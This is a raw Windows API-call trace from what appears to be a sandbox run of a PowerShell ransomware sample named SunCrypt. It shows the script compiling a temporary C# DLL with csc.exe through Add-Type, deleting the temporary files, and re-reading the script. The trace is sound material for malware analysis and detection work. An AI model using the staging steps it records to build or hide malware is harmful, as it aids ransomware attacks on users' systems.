(dwNewMode=0x1, lpOldMode=0x4ebec58) returned 1 [0091.117] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0091.117] GetFileType (hFile=0x504) returned 0x1 [0091.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebec54) returned 1 [0091.117] GetFileType (hFile=0x504) returned 0x1 [0091.117] CloseHandle (hObject=0x504) returned 1 [0091.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0091.123] LocalReAlloc (hMem=0x4265bc8, uBytes=0x82, uFlags=0x2) returned 0x4265bc8 [0091.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", nBufferLength=0x41, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", lpFilePart=0x0) returned 0x40 [0091.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebec20) returned 1 [0091.124] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.cmdline"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0091.124] GetFileType (hFile=0x504) returned 0x1 [0091.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebec1c) returned 1 [0091.124] GetFileType (hFile=0x504) returned 0x1 [0091.125] WriteFile (in: hFile=0x504, lpBuffer=0x646a6e8*, nNumberOfBytesToWrite=0x17b, lpNumberOfBytesWritten=0x4ebec8c, lpOverlapped=0x0 | out: lpBuffer=0x646a6e8*, lpNumberOfBytesWritten=0x4ebec8c*=0x17b, lpOverlapped=0x0) returned 1 [0091.127] CloseHandle (hObject=0x504) returned 1 [0091.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2f [0091.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x2f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0091.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0091.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", nBufferLength=0x36, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", lpFilePart=0x0) returned 0x35 [0091.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe9fc) returned 1 [0091.130] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\csc.exe"), fInfoLevelId=0x0, lpFileInformation=0x4ebecc0 | out: lpFileInformation=0x4ebecc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23456500, ftCreationTime.dwHighDateTime=0x1d4e503, ftLastAccessTime.dwLowDateTime=0xb68ed4f0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x23456500, ftLastWriteTime.dwHighDateTime=0x1d4e503, nFileSizeHigh=0x0, nFileSizeLow=0x20aa88)) returned 1 [0091.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe9f8) returned 1 [0091.131] LocalReAlloc (hMem=0x4265bc8, uBytes=0x208, uFlags=0x2) returned 0x4265bc8 [0091.131] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4265bc8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.132] GetCurrentProcess () returned 0xffffffff [0091.132] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebec34 | out: TokenHandle=0x4ebec34*=0x504) returned 1 [0091.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0091.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", lpFilePart=0x0) returned 0x3c [0091.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeacc) returned 1 [0091.135] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.out"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x646c2b0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x50c [0091.139] GetFileType (hFile=0x50c) returned 0x1 [0091.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeac8) returned 1 [0091.139] GetFileType (hFile=0x50c) returned 0x1 [0091.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0091.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", lpFilePart=0x0) returned 0x3c [0091.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeacc) returned 1 [0091.139] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.err"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x646c364, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x510 [0091.171] GetFileType (hFile=0x510) returned 0x1 [0091.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeac8) returned 1 [0091.171] GetFileType (hFile=0x510) returned 0x1 [0091.172] WriteFile (in: hFile=0x50c, lpBuffer=0x646dbf0*, nNumberOfBytesToWrite=0x1ce, lpNumberOfBytesWritten=0x4ebeb44, lpOverlapped=0x0 | out: lpBuffer=0x646dbf0*, lpNumberOfBytesWritten=0x4ebeb44*=0x1ce, lpOverlapped=0x0) returned 1 [0091.176] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0091.176] GetEnvironmentStringsW () returned 0x4279c60* [0091.178] FreeEnvironmentStringsW (penv=0x4279c60) returned 1 [0091.182] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x64734b4, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x4ebe9ac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x50c, hStdError=0x510), lpProcessInformation=0x646c38c | out: lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline\"", lpProcessInformation=0x646c38c*(hProcess=0x518, hThread=0x514, dwProcessId=0x94, dwThreadId=0x884)) returned 1 [0091.261] CloseHandle (hObject=0x50c) returned 1 [0091.262] CloseHandle (hObject=0x510) returned 1 [0091.263] GetCurrentProcess () returned 0xffffffff [0091.263] GetCurrentProcess () returned 0xffffffff [0091.263] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x4ebeb68, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x4ebeb68*=0x510) returned 1 [0091.264] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x927c0, cHandles=0x1, pHandles=0x4ebeb60*=0x510, lpdwindex=0x4ebe984 | out: lpdwindex=0x4ebe984) returned 0x0 [0097.469] CloseHandle (hObject=0x510) returned 1 [0097.469] GetExitCodeProcess (in: hProcess=0x518, lpExitCode=0x4ebec70 | out: lpExitCode=0x4ebec70*=0x0) returned 1 [0097.469] CloseHandle (hObject=0x518) returned 1 [0097.469] CloseHandle (hObject=0x514) returned 1 [0097.469] CloseHandle (hObject=0x504) returned 1 [0097.470] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.470] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", lpFilePart=0x0) returned 0x3c [0097.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebec08) returned 1 [0097.470] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x504 [0097.471] GetFileType (hFile=0x504) returned 0x1 [0097.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebec04) returned 1 [0097.471] GetFileType (hFile=0x504) returned 0x1 [0097.471] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x4ebed04 | out: lpFileSizeHigh=0x4ebed04*=0x0) returned 0xe00 [0097.471] ReadFile (in: hFile=0x504, lpBuffer=0x6474bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebecb0, lpOverlapped=0x0 | out: lpBuffer=0x6474bb0*, lpNumberOfBytesRead=0x4ebecb0*=0xe00, lpOverlapped=0x0) returned 1 [0097.472] CloseHandle (hObject=0x504) returned 1 [0097.472] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.472] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", lpFilePart=0x0) returned 0x3c [0097.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebea34) returned 1 [0097.472] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.pdb"), fInfoLevelId=0x0, lpFileInformation=0x4ebecf8 | out: lpFileInformation=0x4ebecf8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0097.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebea30) returned 1 [0097.481] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe00, lpName=0x0) returned 0x504 [0097.482] CloseHandle (hObject=0x504) returned 1 [0097.528] CloseHandle (hObject=0x500) returned 1 [0097.528] GetCurrentProcess () returned 0xffffffff [0097.528] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebed2c | out: TokenHandle=0x4ebed2c*=0x500) returned 1 [0097.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0097.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", nBufferLength=0x41, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline", lpFilePart=0x0) returned 0x40 [0097.529] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.cmdline")) returned 1 [0097.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out", lpFilePart=0x0) returned 0x3c [0097.531] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.out" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.out")) returned 1 [0097.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll", lpFilePart=0x0) returned 0x3c [0097.534] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.dll")) returned 1 [0097.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb", lpFilePart=0x0) returned 0x3c [0097.535] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.pdb" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.pdb")) returned 0 [0097.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err", lpFilePart=0x0) returned 0x3c [0097.536] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.err" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.err")) returned 1 [0097.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0097.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp", lpFilePart=0x0) returned 0x3c [0097.536] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.tmp" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.tmp")) returned 1 [0097.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0097.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", nBufferLength=0x3e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs", lpFilePart=0x0) returned 0x3d [0097.537] DeleteFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.0.cs" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj\\bx213pkj.0.cs")) returned 1 [0097.539] CloseHandle (hObject=0x500) returned 1 [0097.545] EtwEventActivityIdControl () returned 0x0 [0097.550] ReportEventW (hEventLog=0x3b50004, wType=0x4, wCategory=0x8, dwEventID=0x320, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x647a344*="Add-Type -TypeDefinition @'\r\n", lpRawData=0x647a26c) returned 1 [0097.599] EtwEventWriteTransfer () returned 0x0 [0097.599] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2f6a9f8d, Data2=0x2657, Data3=0x485e, Data4=([0]=0x83, [1]=0xc4, [2]=0x8e, [3]=0xf2, [4]=0x73, [5]=0x83, [6]=0x71, [7]=0xaa))) returned 0x0 [0097.600] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.601] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.601] CoTaskMemFree (pv=0x4272d90) [0097.602] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701041816803) returned 1 [0097.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.602] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.611] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701042756971) returned 1 [0097.611] EtwEventActivityIdControl () returned 0x0 [0097.611] EtwEventActivityIdControl () returned 0x0 [0097.611] EtwEventActivityIdControl () returned 0x0 [0097.611] EtwEventActivityIdControl () returned 0x0 [0097.611] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xaa6b93eb, Data2=0x926e, Data3=0x4351, Data4=([0]=0x98, [1]=0x28, [2]=0x44, [3]=0xa4, [4]=0xbc, [5]=0x2b, [6]=0xcf, [7]=0xa3))) returned 0x0 [0097.612] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.612] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.612] CoTaskMemFree (pv=0x4272d90) [0097.613] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701042911743) returned 1 [0097.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.616] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701043225987) returned 1 [0097.616] EtwEventActivityIdControl () returned 0x0 [0097.616] EtwEventActivityIdControl () returned 0x0 [0097.616] EtwEventActivityIdControl () returned 0x0 [0097.617] EtwEventActivityIdControl () returned 0x0 [0097.618] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7dcec088, Data2=0xc496, Data3=0x4afe, Data4=([0]=0x88, [1]=0x4, [2]=0xb0, [3]=0x54, [4]=0x27, [5]=0x9a, [6]=0xd3, [7]=0xe))) returned 0x0 [0097.618] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.618] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.618] CoTaskMemFree (pv=0x4272d90) [0097.618] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701043505031) returned 1 [0097.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.619] 